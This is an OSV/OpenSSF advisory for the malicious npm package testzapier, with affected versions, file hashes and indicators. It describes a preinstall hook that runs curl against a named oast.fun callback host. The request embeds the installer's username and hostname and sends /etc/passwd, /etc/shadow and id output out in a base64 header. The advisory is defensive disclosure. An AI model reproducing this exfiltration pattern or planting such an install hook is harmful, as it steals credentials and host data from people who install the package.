MAL-2026-5575

See a problem?

Import Source

https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/testzapier/MAL-2026-5575.json

JSON Data

https://api.osv.dev/v1/vulns/MAL-2026-5575

Published

2026-06-11T04:37:03Z

Modified

2026-06-11T05:46:34.816239928Z

Summary

Malicious code in testzapier (npm)

Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (a5840f2a3b34d7f32de7243a146ecf85ac875bd1ef09b0ba9a395d08e356084f)

package.json declares a preinstall hook (node index.js) that fires automatically on npm install. index.js spawns a shell that runs curl -X POST against http://kpfdtycruuyszysbsjtoj9al6djfqrtve.oast.fun/noderedactedsdk/$(whoami)/$(hostname)/, embedding the installer's username and hostname in the URL path. The User-Agent header carries a base64-encoded blob containing the contents of /etc/passwd, /etc/hosts, /etc/shadow (when readable as root), and the output of id. The destination is an interactsh/oast.fun OOB-callback subdomain, plain HTTP, with no relationship to any documented package purpose. Installer harm is direct and unconditional: any machine running npm install testzapier leaks host identity and local-account/secret-file contents to the attacker.

Database specific

{
    "malicious-packages-origins": [
        {
            "id": "IN-MAL-2026-005461",
            "versions": [
                "1.0.1"
            ],
            "sha256": "045f2a9515d6ea6e0d97f528486c1ed7ffb6626ae018c414b5842ba2db15fac1",
            "source": "amazon-inspector",
            "modified_time": "2026-06-11T04:37:10Z",
            "import_time": "2026-06-11T05:40:57.221108557Z"
        },
        {
            "id": "IN-MAL-2026-005460",
            "import_time": "2026-06-11T05:40:57.127194827Z",
            "sha256": "a5840f2a3b34d7f32de7243a146ecf85ac875bd1ef09b0ba9a395d08e356084f",
            "source": "amazon-inspector",
            "modified_time": "2026-06-11T04:37:03Z",
            "versions": [
                "1.0.0"
            ]
        }
    ]
}

References

Credits

- Amazon Inspector - FINDER
- - inspector-research@amazon.com

Affected packages

npm / testzapier

Package

Name: testzapier; View open source insights on deps.dev
Purl: pkg:npm/testzapier

Affected ranges

Affected versions

1.*

1.0.0

1.0.1

Database specific

source

"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/testzapier/MAL-2026-5575.json"

cwes

[
    {
        "cweId": "CWE-506",
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature."
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]

indicators

{
    "evidence_files": [
        {
            "path": "index.js",
            "sha256": "fbaabfcebd13909c0b2cfb768cce31fa97ad5d44c303eb328ee3d84351e68852",
            "tlsh": "cef0dc5a48f5e83677f218bcef049c1f7747ea800436b35354ef6618235c9a884aa0b7"
        },
        {
            "path": "package.json",
            "sha256": "db06e32ac36e947460a4855b1a1ea12fcd4d710051eaf8bbc809eb4334c631d0",
            "tlsh": "5fd05e245e23953365c4266a1d2aa4867261cebf08143c0da3db142e93cf67798ff32c"
        }
    ],
    "package_integrity": [
        {
            "filename": "testzapier-1.0.1.tgz",
            "hashes": {
                "sha512_sri": "sha512-wiKHGj8gNG+rJpnPbwH1OUDqA4JXnuW91SO1N2tyk4U6VGtpWSQbkXGAeM9HirAwvwUylQCpW8ZW74GRjAKl/g==",
                "sha1": "18b84099166da0d71bf41fe7992b13d2a01e1b08"
            }
        }
    ]
}